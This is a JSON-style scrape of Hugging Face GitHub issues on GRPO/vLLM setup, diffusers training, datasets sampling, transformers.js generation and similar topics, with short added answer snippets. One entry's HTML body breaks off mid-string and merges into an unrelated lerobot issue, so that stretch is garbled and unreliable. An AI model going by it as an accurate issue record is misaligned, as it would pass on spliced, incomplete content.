from the same prompts.\n                        enable_prefix_caching=True,\n                        max_model_len=self.args.vllm_max_model_len,\n                    )\n                self.sampling_params = SamplingParams(\n                    temperature=args.temperature,\n                    max_tokens=self.max_completion_length,\n                )\n\n```",
    "url": "https://github.com/huggingface/open-r1/issues/260",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T07:17:07Z",
    "updated_at": "2025-02-20T12:21:15Z",
    "user": "bannima"
  },
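On the vLLM side, tensor parallelism is a constructor argument; the snippet above pins a single device and patches the world size to 1, which is why TP cannot simply be enabled there. A standalone sketch of the vLLM call (the model id is illustrative):

```python
# Sketch: standalone vLLM with tensor parallelism. Whether the GRPO trainer can
# pass this argument through depends on the installed TRL version; this only
# shows the vLLM side.
from vllm import LLM, SamplingParams

llm = LLM(
    model="Qwen/Qwen2.5-72B-Instruct",  # illustrative 72B checkpoint
    tensor_parallel_size=4,             # shard weights across 4 GPUs
    gpu_memory_utilization=0.9,
    enable_prefix_caching=True,
)
out = llm.generate(["Hello"], SamplingParams(temperature=0.7, max_tokens=64))
```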
  {
    "repo": "huggingface/trl",
    "number": 2814,
    "title": "How to use tensor_parallel_size for vllm reference in GRPO?",
    "body": "GRPO use vllm to load reference model for data sampling , The limitation is that tensor parallel are not supported.\nWhat if the reference model is larger than One GPU can hold, for example, 72B with 40GB's H800, \n\nIs there any setting we can set the tensor_parallel_size for vllm params?\n\n```\n        if self.accelerator.is_main_process:\n                vllm_device = self.args.vllm_device\n                if vllm_device == \"auto\":\n                    vllm_device = f\"cuda:{self.accelerator.num_processes}\"  # take the next GPU idx\n                # Check that the requested device is available\n                if vllm_device.split(\":\")[0] == \"cuda\" and int(vllm_device.split(\":\")[1]) >= torch.cuda.device_count():\n                    raise ValueError(\n                        f\"The requested device for vllm ({vllm_device}) is not available. You are likely using vLLM \"\n                        \"without restricting the number of GPUs for training. Set the `--num_processes` argument to a \"\n                        \"value lower than the number of GPUs available on your machine\u2014typically, reducing it by one \"\n                        f\"is sufficient. In your case: `--num_processes {torch.cuda.device_count() - 1}`.\"\n                    )\n                # Check that the requested device is not also used for training\n                if vllm_device in {f\"cuda:{idx}\" for idx in range(self.accelerator.num_processes)}:\n                    warnings.warn(\n                        f\"The requested device {vllm_device} is also used for training. This may lead to unexpected \"\n                        \"behavior. It is recommended to use a dedicated device for vLLM.\"\n                    )\n                # vLLM is not compatible with accelerate. So we need to patch it to make sure we can (1) place the vLLM\n                # model on the desired device (world_size_patch) and (2) avoid a test that is not designed for our\n                # setting (profiling_patch).\n                world_size_patch = patch(\"torch.distributed.get_world_size\", return_value=1)\n                profiling_patch = patch(\n                    \"vllm.worker.worker.Worker._assert_memory_footprint_increased_during_profiling\", return_value=None\n                )\n                with world_size_patch, profiling_patch:\n                    self.llm = LLM(\n                        model=model.name_or_path,\n                        device=vllm_device,\n                        gpu_memory_utilization=self.args.vllm_gpu_memory_utilization,\n                        dtype=self.args.vllm_dtype,\n                        # Automatic Prefix Caching caches the KV cache of existing queries, so that a new query can\n                        # directly reuse the KV cache if it shares the same prefix with one of the existing queries.\n                        # This is particularly useful here because we generate completions from the same prompts.\n                        enable_prefix_caching=True,\n                        max_model_len=self.args.vllm_max_model_len,\n                    )\n                self.sampling_params = SamplingParams(\n                    temperature=args.temperature,\n                    max_tokens=self.max_completion_length,\n                )```",
    "url": "https://github.com/huggingface/trl/issues/2814",
    "state": "open",
    "labels": [
      "\u26a1accelerate",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-02-10T07:09:47Z",
    "updated_at": "2025-03-04T11:40:13Z",
    "user": "bannima"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 10755,
    "title": "Difference in Output When Using PIL.Image vs numpy.array for Image and Mask Input.",
    "body": "hi. \nI get different results when providing image and mask as input using PIL.Image versus numpy. array. Why does this happen?\nIs there an issue with my normalization method?\n\n| pillow | array |\n|---|---|\n| ![Image](https://github.com/user-attachments/assets/8e8a3af8-00cd-4675-93ce-b1c05eec4eb5) | ![Image](https://github.com/user-attachments/assets/25253b2a-9758-4a0f-8925-42e7a1558e50) |\n\n#### pillow code\n```python\nimage = Image.open(image_path).convert(\"RGB\")\nmask = Image.open(mask_path).convert(\"L\")\n\noutput_image = pipeline(\n    image=image,\n    mask_image=mask,\n    generator=torch.Generator(device=self.device).manual_seed(0),\n).images[0]\n\n```\n#### array code\n```python\nimage = Image.open(image_path).convert(\"RGB\")\nmask = Image.open(mask_path).convert(\"L\")\nimage_array = np.array(image) / 255.0\nmask_array = np.array(mask) / 255.0\n\noutput_image = pipeline(\n    image=image_array,\n    mask_image=mask_array,\n    generator=torch.Generator(device=self.device).manual_seed(0),\n).images[0]\n```\n",
    "url": "https://github.com/huggingface/diffusers/issues/10755",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-02-10T05:24:27Z",
    "updated_at": "2025-03-12T15:03:12Z",
    "comments": 2,
    "user": "purple-k"
  },
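One way to localize a discrepancy like the one above is to compare the tensors the pipeline actually receives for both input types; a diagnostic sketch, assuming the inpaint pipeline exposes a VaeImageProcessor-based `image_processor` as the standard diffusers pipelines do (`pipeline` and the file path are placeholders from the issue):

```python
# Diagnostic sketch: compare preprocessed inputs for the PIL vs numpy paths.
import numpy as np
import torch
from PIL import Image

image = Image.open("image.png").convert("RGB")
image_array = np.array(image) / 255.0  # float64 in [0, 1]

t_pil = pipeline.image_processor.preprocess(image)       # `pipeline` as above
t_np = pipeline.image_processor.preprocess(image_array)
print(torch.allclose(t_pil.float(), t_np.float()),
      (t_pil.float() - t_np.float()).abs().max())
```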
  {
    "repo": "huggingface/datasets",
    "number": 7387,
    "title": "Dynamic adjusting dataloader sampling weight",
    "body": "Hi,\nThanks for your wonderful work! I'm wondering is there a way to dynamically adjust the sampling weight of each data in the dataset during training? Looking forward to your reply, thanks again.",
    "url": "https://github.com/huggingface/datasets/issues/7387",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T03:18:47Z",
    "updated_at": "2025-03-07T14:06:54Z",
    "comments": 3,
    "user": "whc688"
  },
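One common workaround at the DataLoader level is a PyTorch WeightedRandomSampler whose weights are refreshed between epochs; a sketch, where `train_dataset` and `num_epochs` are placeholders:

```python
# Sketch: per-sample weights updated between epochs via WeightedRandomSampler.
import torch
from torch.utils.data import DataLoader, WeightedRandomSampler

weights = torch.ones(len(train_dataset), dtype=torch.double)  # one per sample

for epoch in range(num_epochs):
    sampler = WeightedRandomSampler(weights, num_samples=len(weights), replacement=True)
    loader = DataLoader(train_dataset, batch_size=32, sampler=sampler)
    for batch in loader:
        ...  # training step
    # mutate `weights` here, e.g. from per-sample losses, before the next epoch
```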
  {
    "repo": "huggingface/trl",
    "number": 2813,
    "title": "What is the minimum GPU requirement in gigabytes for TRL intensive training?",
    "body": "",
    "url": "https://github.com/huggingface/trl/issues/2813",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-10T02:52:07Z",
    "updated_at": "2025-02-11T08:41:56Z",
    "user": "lonngxiang"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1188,
    "title": "It seems like Xenova/swin2SR-classical-sr-x2-64 model only work with image url?How to implement partial output with it?",
    "body": "### Question\n\nI have fun with react demo and Xenova/swin2SR-classical-sr-x2-64 model.\nhttps://huggingface.co/Xenova/swin2SR-classical-sr-x2-64\nI tried to give object URL to upscaler function but it doesn't work, I wonder if it only accepts image url.\nAlso I want to know how to do partial output like the translate react demo.\n\nI tried to convert output data to base64 for rendering but It doesn't work.\n\n![Image](https://github.com/user-attachments/assets/928eaf32-dd80-469f-9bd2-6dd88c876e74)\n![Image](https://github.com/user-attachments/assets/f63fd713-0738-4fd6-86ff-657963dba2bc)\n\nIs it output png rawdata only?",
    "url": "https://github.com/huggingface/transformers.js/issues/1188",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-10T02:18:32Z",
    "updated_at": "2025-02-16T00:50:36Z",
    "user": "codenoobforreal"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1186,
    "title": "Which undocumented transformersJS Generator parameters are supported? crapCheck ran fine.",
    "body": "### Question\n\nSorry to bug you again Josh   @xenova    I was trying a set of generator parameters and things were working fine without errors so I tried the parameter \"crapCheck\" and it also ran without errors so now I am worried if anything works. In the docs it seems that these are supported:  \n\nSupported Parameters (Confirmed in Docs)\n\nmax_new_tokens: \u2705 Yes (Controls the number of new tokens to generate)\n\ndo_sample: \u2705 Yes (Enables sampling)\n\ntop_p: \u2705 Yes (Nucleus sampling)\n\ntemperature: \u2705 Yes (Controls randomness)\n\ntop_k: \u2705 Yes (Top-k filtering)\n\nnum_return_sequences: \u2705 Yes (Number of sequences to return)\n\n\n  Demo code [here](https://hpssjellis.github.io/my-examples-of-transformersJS/public/deepseek-r1-webgpu/deepseek-r1-webgpu-00.html) but without all the below parameters, just some of them.\n\nAny suggestions on what may work and what to ignore?\n\n```\n\n    const output = await generator(messages, {\n\n\n      max_new_tokens: myMaxT,          // 512\n      do_sample: myDo_sample,          // true\n      top_p: myTop_p,                          // 0.9  \n      temperature: myTemperature,    // 0.7\n      top_k: myTop_k,                          // testing if it does top_k  50\n      num_return_sequences: 1,          // 1\n      streamer,                                     // calls the function TextStreamer\n\n      min_length: myMin_length,                          // Ensures at least 20 tokens are generated\n      repetition_penalty: myRepetition_penalty,   // 1.2\n      length_penalty: myLength_penalty,             // 1.5\n\n      early_stopping: myEarly_stopping,               // end testing  true false\n      chain_of_thought: myChain_of_thought,      // true\n      stopping_criteria: stoppingCriteria,              // Use stopping criteria for clean stopping\n\n      crapCheck: 65,                                             // fairly sure this is not supported\n\n    });\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1186",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-02-09T05:35:57Z",
    "updated_at": "2025-02-09T05:35:57Z",
    "user": "hpssjellis"
  },
  {
    "repo": "huggingface/lighteval",
    "number": 545,
    "title": "couldn't find it in the cached files and it looks like Elron/bleurt-tiny-512, how to set the model path?",
    "body": "How to set the eval model path?\n## Eval\nwhen I use the script to eval model  with MATH-500\n\n`NUM_GPUS=8 # Set to 8 for 32B and 70B models\nMODEL=Deepseek_R1_distill/Qwen2.5-32B-Open-R1-Distill/\nMODEL_ARGS=\"pretrained=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilisation=0.8,tensor_parallel_size=$NUM_GPUS\"\nOUTPUT_DIR=data/evals/Qwen2.5-32B-Open-R1-Distill\n\nlighteval vllm $MODEL_ARGS \"custom|math_500|0|0\" \\\n    --custom-tasks src/open_r1/evaluate.py \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR\n`\n\n\n##  Error\nError: We couldn't connect to 'https://huggingface.co' to load this file, couldn't find it in the cached files and it looks like Elron/bleurt-tiny-512 is not the path to a directory containing a file named \nconfig.json.\n\nWhere to set the eval model path in the script?",
    "url": "https://github.com/huggingface/lighteval/issues/545",
    "state": "closed",
    "labels": [],
    "created_at": "2025-02-08T07:26:28Z",
    "updated_at": "2025-05-15T15:27:30Z",
    "user": "bannima"
  },
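The error above concerns the metric's scorer model (Elron/bleurt-tiny-512) being fetched from the Hub, not the eval model path itself. A hedged workaround sketch: warm the local Hugging Face cache on a machine with network access, then reuse that cache (e.g. by copying it or pointing HF_HOME at it) on the offline node:

```python
# Sketch: pre-download the scorer model into the local Hugging Face cache.
from huggingface_hub import snapshot_download

snapshot_download("Elron/bleurt-tiny-512")
```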
  {
    "repo": "huggingface/open-r1",
    "number": 240,
    "title": "How to do knowledge distillation training",
    "body": "In the deepseek r1 technical report, there is a small model based on distillation at the end; deepseek r1, as the teacher model,  qwen and llama, as the student model, do SFT based on distilled data. However, it seems that the process of knowledge distillation is not involved here(open r1), that is, the process of the r1 teacher model modifying the output of the student model, but simply SFT based on distilled data.",
    "url": "https://github.com/huggingface/open-r1/issues/240",
    "state": "open",
    "labels": [],
    "created_at": "2025-02-08T06:50:20Z",
    "updated_at": "2025-02-27T08:16:02Z",
    "user": "RyanOvO"
  },
  {
    "repo": "huggingface/transformers.js-examples",
    "number": 42,
    "title": "How to stop the transformerJS webGPU models when they chat for too long.",
    "body": "@xenova Hi Josh.\n\nI am making several very capable TransformerJS single page applications and I really like what they are doing. My demo  index page is [here](https://hpssjellis.github.io/my-examples-of-transformersJS/public/index.html), but I can't seem to stop any of my examples if they are taking too long and then be able to do another request. I have tried several methods with the streamer, a stopFlag or an AbortController but nothing seems to be error free.\n\nAny suggestions I have included my single page application of deepseekR1 for reference.\n(Note: Single page applications are great for beginners and can be easily downloaded and ran locally after the model is cached)\n\n\n\n```\n\n\n\n\n\n  \n\n\n\n

DeepSeek-R1-webgpu in the browser

\n \nOpen the console. shift-ctrl-i

\n \nFully javascript activated. If you don't want to completely download \n \nonnx-community/DeepSeek-R1-Distill-Qwen-1.5B-ONNX then you should probably close this page.

\nIt will load from cache if downloaded once.

\n\nUses the Web-gpu model or other models: How do I retrieve real-time observations from the real robot with Lerobot?\n\n- Evaluating in simulation (Isaac Gym):\n\n> Can I directly evaluate my trained policy in Isaac Gym?\n ", "url": "https://github.com/huggingface/lerobot/issues/692", "state": "closed", "labels": [ "question", "simulation" ], "created_at": "2025-02-07T13:40:27Z", "updated_at": "2025-10-17T11:20:29Z", "user": "ShiyaoExtendQA" }, { "repo": "huggingface/diffusers", "number": 10743, "title": "Support zero-3 for FLUX training", "body": "### Describe the bug\n\nDue to memory limitations, I am attempting to use Zero-3 for Flux training on 8 GPUs with 32GB each. I encountered a bug similar to the one reported in this issue: https://github.com/huggingface/diffusers/issues/1865. I made modifications based on the solution proposed in this pull request: https://github.com/huggingface/diffusers/pull/3076. However, the same error persists. In my opinion, the fix does not work as expected, at least not entirely. Could you advise on how to modify it further?\n\nThe relevant code from https://github.com/huggingface/diffusers/blob/main/examples/dreambooth/train_dreambooth_lora_flux.py#L1157 has been updated as follows:\n```\n def deepspeed_zero_init_disabled_context_manager():\n \"\"\"\n returns either a context list that includes one that will disable zero.Init or an empty context list\n \"\"\"\n\n deepspeed_plugin = AcceleratorState().deepspeed_plugin if accelerate.state.is_initialized() else None\n print(f\"deepspeed_plugin: {deepspeed_plugin}\")\n if deepspeed_plugin is None:\n return []\n\n return [deepspeed_plugin.zero3_init_context_manager(enable=False)]\n\n with ContextManagers(deepspeed_zero_init_disabled_context_manager()):\n text_encoder_one, text_encoder_two = load_text_encoders(text_encoder_cls_one, text_encoder_cls_two)\n vae = AutoencoderKL.from_pretrained(\n args.pretrained_model_name_or_path,\n subfolder=\"vae\",\n revision=args.revision,\n variant=args.variant,\n )\n```\n\n### Reproduction\n\ndeepspeed config:\n```json\n{\n \"train_batch_size\": \"auto\",\n \"train_micro_batch_size_per_gpu\": \"auto\",\n \"gradient_accumulation_steps\":\"auto\",\n \"zero_optimization\": {\n \"stage\": 3,\n \"offload_optimizer\": {\"device\": \"cpu\"},\n \"stage3_gather_16bit_weights_on_model_save\": false,\n \"overlap_comm\": false\n },\n \"bf16\": {\n \"enabled\": true\n },\n \"fp16\": {\n \"enabled\": false\n }\n }\n \n```\n\naccelerate config:\n```\ncompute_environment: LOCAL_MACHINE\ndeepspeed_config:\n deepspeed_config_file: \"config/ds_config.json\"\ndistributed_type: DEEPSPEED\nmachine_rank: 0\nmain_training_function: main\nnum_machines: 1\nnum_processes: 8\n```\n\ntraining shell:\n```\n#!/bin/bash\n\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\nexport INSTANCE_DIR=\"dog\"\nexport OUTPUT_DIR=\"trained-flux\"\n\nexport DS_SKIP_CUDA_CHECK=1\n\nexport ACCELERATE_CONFIG_FILE=\"config/accelerate_config.yaml\"\n\nACCELERATE_CONFIG_FILE_PATH=${1:-$ACCELERATE_CONFIG_FILE} \n\nFLUXOUTPUT_DIR=flux_lora_output\n\nmkdir -p $FLUXOUTPUT_DIR\n\naccelerate launch --config_file $ACCELERATE_CONFIG_FILE_PATH train_dreambooth_lora_flux.py \\\n --pretrained_model_name_or_path=$MODEL_NAME \\\n --instance_data_dir=$INSTANCE_DIR \\\n --output_dir=$OUTPUT_DIR \\\n --mixed_precision=\"bf16\" \\\n --instance_prompt=\"a photo of sks dog\" \\\n --resolution=1024 \\\n --train_batch_size=4 \\\n --guidance_scale=1 \\\n --gradient_accumulation_steps=1 \\\n --learning_rate=1e-4 \\\n 
--report_to=\"tensorboard\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --max_train_steps=100 \\\n --gradient_checkpointing \\\n --seed=\"0\"\n\n```\n\n### Logs\n\n```shell\nRuntimeError: 'weight' must be 2-D\n```\n\n### System Info\n\npytorch: 2.1.0\ndeepspeed: 0.14.0\naccelerate: 1.3.0\ndiffusers: develop\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10743", "state": "closed", "labels": [ "bug" ], "created_at": "2025-02-07T12:50:44Z", "updated_at": "2025-10-27T09:33:59Z", "comments": 9, "user": "xiaoyewww" }, { "repo": "huggingface/alignment-handbook", "number": 210, "title": "Problem with multi-epoch training", "body": "Hi, I run the orpo code with 1 epoch and there was no issue. But when I tried to run the code with 5 epochs, I had the following error just at the start of the second epoch:\n\n```\nRuntimeError: Tensors of the same index must be on the same device and the same dtype except `step` tensors that can be CPU and float32 notwithstanding\n``` \n\nAny idea of what could be wrong and how to fix it? Thank you! ", "url": "https://github.com/huggingface/alignment-handbook/issues/210", "state": "open", "labels": [], "created_at": "2025-02-07T04:50:41Z", "updated_at": "2025-02-07T04:50:41Z", "comments": 0, "user": "sowmaster" }, { "repo": "huggingface/smolagents", "number": 521, "title": "authenticated sessions with smolagents (how to be logged in during browser use)", "body": "**Is your feature request related to a problem? Please describe.**\nI would like smolagents to be able to use websites with my login credentials.\n\n**Describe the solution you'd like**\nEither a way to give Helium credentials, or a way to use my actual browser, like: https://github.com/browser-use/browser-use/blob/main/examples/browser/real_browser.py\n\n**Is this not possible with the current options.**\nI'm fairly certain this is not possible with the current implementation. (If it is, can you make a demo code?)\n\n**Describe alternatives you've considered**\nI can use https://github.com/browser-use/browser-use/ instead\n\n**Additional context**\nhttps://github.com/browser-use/browser-use/ does a really good job of providing multiple options for this. 
", "url": "https://github.com/huggingface/smolagents/issues/521", "state": "open", "labels": [ "enhancement" ], "created_at": "2025-02-06T15:51:53Z", "updated_at": "2025-02-06T15:51:53Z", "user": "rawwerks" }, { "repo": "huggingface/open-r1", "number": 210, "title": "How to push own dataset to hub with train and test dataset?", "body": "How do I push my own dataset to the hub along with the training and test datasets?\n\n```python\n train_distiset = pipeline.run(dataset=train_dataset)\n test_distiset = pipeline.run(dataset=test_dataset)\n```\nThere is a problem with the code above.", "url": "https://github.com/huggingface/open-r1/issues/210", "state": "closed", "labels": [], "created_at": "2025-02-06T15:28:15Z", "updated_at": "2025-02-08T05:59:13Z", "user": "JACKYLUO1991" }, { "repo": "huggingface/peft", "number": 2364, "title": "docs: broken links to boft", "body": "### System Info\n\non page: https://huggingface.co/docs/peft/v0.14.0/en/conceptual_guides/oft \n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\non page: https://huggingface.co/docs/peft/v0.14.0/en/conceptual_guides/oft \n\nSnippet:\n\nTake a look at the following step-by-step guides on how to finetune a model with BOFT:\n\n[Dreambooth finetuning with BOFT](https://huggingface.co/docs/peft/v0.14.0/en/task_guides/boft_dreambooth)\n[Controllable generation finetuning with BOFT (ControlNet)](https://huggingface.co/docs/peft/v0.14.0/en/task_guides/boft_controlnet)\n\n\n### Expected behavior\n\n\nperhaps the links should lead to\n\n https://github.com/huggingface/peft/blob/main/examples/boft_dreambooth/boft_dreambooth.md\n https://github.com/huggingface/peft/blob/main/examples/boft_controlnet/boft_controlnet.md", "url": "https://github.com/huggingface/peft/issues/2364", "state": "closed", "labels": [], "created_at": "2025-02-06T14:48:16Z", "updated_at": "2025-02-07T10:14:44Z", "comments": 1, "user": "makelinux" }, { "repo": "huggingface/open-r1", "number": 207, "title": "DeepSeek RL-Zero: How to clone DeepSeek RL-Zero?", "body": "How to clone DeepSeek RL-Zero?", "url": "https://github.com/huggingface/open-r1/issues/207", "state": "open", "labels": [], "created_at": "2025-02-06T13:45:33Z", "updated_at": "2025-02-06T13:45:33Z", "user": "win10ogod" }, { "repo": "huggingface/smolagents", "number": 501, "title": "How to run open_deep_research\uff1f", "body": "How to run open_deep_research\uff1f", "url": "https://github.com/huggingface/smolagents/issues/501", "state": "closed", "labels": [ "bug" ], "created_at": "2025-02-05T13:35:52Z", "updated_at": "2025-03-19T07:28:22Z", "user": "win4r" }, { "repo": "huggingface/trl", "number": 2768, "title": "How to log more metrics with wandb when using GRPO trainer and accelerate", "body": "### Reproduction\n\n```python\n\ndef correctness_reward_func(prompts, completions, answer, **kwargs) -> list[float]:\n responses = [completion[0][\"content\"] for completion in completions]\n q = prompts[0][-1][\"content\"]\n extracted_responses = [extract_xml_answer(r) for r in responses]\n\n # Get current step from trainer's state\n current_step = trainer.state.global_step if hasattr(trainer, \"state\") else 0\n\n # Initialize logger if not already done\n global example_logger\n if not hasattr(correctness_reward_func, \"example_logger\"):\n example_logger = LocalExampleLogger()\n 
correctness_reward_func.example_logger = example_logger\n\n # Log each example\n for i in range(len(responses)):\n example_dict = {\n \"step\": current_step,\n \"question\": q,\n \"true_answer\": answer[i],\n \"response\": responses[i],\n \"extracted_response\": extracted_responses[i],\n \"correct\": extracted_responses[i] == answer[i],\n \"generation_idx\": i, # Which generation attempt this was\n }\n example_logger.log_example(example_dict)\n\n # Calculate marker counts and correctness for all responses\n is_correct = [r == a for r, a in zip(extracted_responses, answer)]\n uncertainty_counts = [count_uncertainty_markers(r) for r in responses]\n internal_dialogue_counts = [count_internal_dialogue_markers(r) for r in responses]\n reflective_counts = [count_reflective_markers(r) for r in responses]\n\n # Separate counts for correct and incorrect responses\n correct_indices = [i for i, correct in enumerate(is_correct) if correct]\n incorrect_indices = [i for i, correct in enumerate(is_correct) if not correct]\n\n # Log metrics using trainer's accelerator\n if hasattr(trainer, \"accelerator\"):\n ### NONE OF THE BELOW ARE LOGGED ON WANDB\n metrics = {\n \"correctness/correct_count\": len(correct_indices),\n \"correctness/total_examples\": len(responses),\n \"correctness/accuracy\": len(correct_indices) / len(responses),\n # Total markers across all responses\n \"markers/total/uncertainty\": sum(uncertainty_counts),\n \"markers/total/internal_dialogue\": sum(internal_dialogue_counts),\n \"markers/total/reflective\": sum(reflective_counts),\n # Markers in correct responses\n \"markers/correct/uncertainty\": sum(\n uncertainty_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n \"markers/correct/internal_dialogue\": sum(\n internal_dialogue_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n \"markers/correct/reflective\": sum(\n reflective_counts[i] for i in correct_indices\n )\n if correct_indices\n else 0,\n # Markers in incorrect responses\n \"markers/incorrect/uncertainty\": sum(\n uncertainty_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n \"markers/incorrect/internal_dialogue\": sum(\n internal_dialogue_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n \"markers/incorrect/reflective\": sum(\n reflective_counts[i] for i in incorrect_indices\n )\n if incorrect_indices\n else 0,\n }\n trainer.accelerator.log(metrics, step=current_step)\n\n return [2.0 if r == a else 0.0 for r, a in zip(extracted_responses, answer)]\n\n.......\n\nmodel_name = config[\"model\"][\"name\"]\noutput_dir = config[\"training\"][\"output_dir\"]\nrun_name = config[\"training\"][\"run_name\"]\n\ntraining_args = GRPOConfig(\n output_dir=output_dir,\n run_name=run_name,\n learning_rate=config[\"training\"][\"learning_rate\"],\n adam_beta1=config[\"training\"][\"adam_beta1\"],\n adam_beta2=config[\"training\"][\"adam_beta2\"],\n weight_decay=config[\"training\"][\"weight_decay\"],\n warmup_ratio=config[\"training\"][\"warmup_ratio\"],\n lr_scheduler_type=config[\"training\"][\"lr_scheduler_type\"],\n logging_steps=config[\"training\"][\"logging_steps\"],\n bf16=config[\"training\"][\"bf16\"],\n per_device_train_batch_size=config[\"training\"][\"per_device_train_batch_size\"],\n gradient_accumulation_steps=config[\"training\"][\"gradient_accumulation_steps\"],\n num_generations=config[\"training\"][\"num_generations\"],\n max_prompt_length=config[\"training\"][\"max_prompt_length\"],\n 
max_completion_length=config[\"training\"][\"max_completion_length\"],\n num_train_epochs=config[\"training\"][\"num_train_epochs\"],\n save_steps=config[\"training\"][\"save_steps\"],\n max_grad_norm=config[\"training\"][\"max_grad_norm\"],\n report_to=[\"wandb\"]\n if (not torch.distributed.is_initialized() or torch.distributed.get_rank() == 0)\n else [],\n log_on_each_node=False, # Only log on main node\n use_vllm", "url": "https://github.com/huggingface/trl/issues/2768", "state": "open", "labels": [ "\u2728 enhancement", "\u26a1accelerate", "\ud83c\udfcb GRPO" ], "created_at": "2025-02-05T03:59:10Z", "updated_at": "2025-02-05T03:59:54Z", "user": "andrewsiah" }, { "repo": "huggingface/open-r1", "number": 183, "title": "How to directly input embeddings into the model?", "body": "My data are embeddings of the tokens (i.e., already after tokenization), is there a way of directly inputting the embeddings into the DeepSeek open-r1 model?\n\nFor example, when I use the BERT model via Hugging Face, I can simply input the embeddings using the \"inputs_embeds\" parameter:\n\n```\nfrom transformers import BertModel\nbert = BertModel.from_pretrained('bert-base-uncased')\noutputs = bert(inputs_embeds = ...)\n```\n\nIs there a similar way of doing so with the DeepSeek open-r1 model?\n\nThank you!", "url": "https://github.com/huggingface/open-r1/issues/183", "state": "open", "labels": [], "created_at": "2025-02-04T21:10:13Z", "updated_at": "2025-02-04T21:10:13Z", "user": "CCCC1800" }, { "repo": "huggingface/open-r1", "number": 180, "title": "How to launch GRPO with vLLM on multi-node slurm?", "body": "How to write sbatch script to run GRPO with vLLM on multiple nodes? What should be `--num_processes`? Is [GRPOTrainer](https://github.com/huggingface/trl/blob/1f344c9377d87cd348d92b78f27afea8e66563d7/trl/trainer/grpo_trainer.py#L288-L298) compatible with multinode training?", "url": "https://github.com/huggingface/open-r1/issues/180", "state": "open", "labels": [], "created_at": "2025-02-04T16:58:50Z", "updated_at": "2025-03-14T15:55:18Z", "user": "pbelevich" }, { "repo": "huggingface/lerobot", "number": 678, "title": "The inverse kinematic solution code of so-100", "body": "Are there any code of inverse kinematic of so-100, which just need the input of the x, y on my desk, then it can move to the target \ncoordinate\uff1f\nThanks for any response.", "url": "https://github.com/huggingface/lerobot/issues/678", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-02-04T03:58:17Z", "updated_at": "2025-10-15T16:55:01Z", "user": "gxy-1111" }, { "repo": "huggingface/diffusers", "number": 10710, "title": "Is DDUF format supported?", "body": "I checked this PR, https://github.com/huggingface/diffusers/pull/10037 and it is merged\n\n```\nfrom diffusers import DiffusionPipeline\nimport torch\n\npipe = DiffusionPipeline.from_pretrained(\n \"DDUF/FLUX.1-dev-DDUF\", dduf_file=\"FLUX.1-dev.dduf\", torch_dtype=torch.bfloat16\n)\n\nimage = pipe(\n \"photo a cat holding a sign that says Diffusers\", num_inference_steps=50, guidance_scale=3.5\n).images[0]\nimage.save(\"cat.png\")\n\n```\n\n```\n(venv) C:\\aiOWN\\diffuser_webui>python FLUX_DDUF.py\nFetching 1 files: 100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 1/1 [00:00\n pipe 
= DiffusionPipeline.from_pretrained(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\huggingface_hub\\utils\\_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\pipelines\\pipeline_utils.py\", line 951, in from_pretrained\n loaded_sub_model = load_sub_model(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\pipelines\\pipeline_loading_utils.py\", line 742, in load_sub_model\n loaded_sub_model = load_method(name, **loading_kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\huggingface_hub\\utils\\_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\models\\modeling_utils.py\", line 931, in from_pretrained\n model_file = _merge_sharded_checkpoints(\n File \"C:\\aiOWN\\diffuser_webui\\venv\\lib\\site-packages\\diffusers\\models\\model_loading_utils.py\", line 365, in _merge_sharded_checkpoints\n raise FileNotFoundError(f\"Part file {file_name} not found.\")\nFileNotFoundError: Part file diffusion_pytorch_model-00003-of-00003.safetensors not found.\n```\n\n\n```\n- \ud83e\udd17 Diffusers version: 0.33.0.dev0\n- Platform: Windows-10-10.0.26100-SP0\n- Running on Google Colab?: No\n- Python version: 3.10.11\n- PyTorch version (GPU?): 2.5.1+cu124 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.27.1\n- Transformers version: 4.48.1\n- Accelerate version: 1.4.0.dev0\n- PEFT version: 0.14.1.dev0\n- Bitsandbytes version: 0.45.1\n- Safetensors version: 0.5.2\n- xFormers version: not installed\n- Accelerator: NVIDIA GeForce RTX 4060 Laptop GPU, 8188 MiB\n- Using GPU in 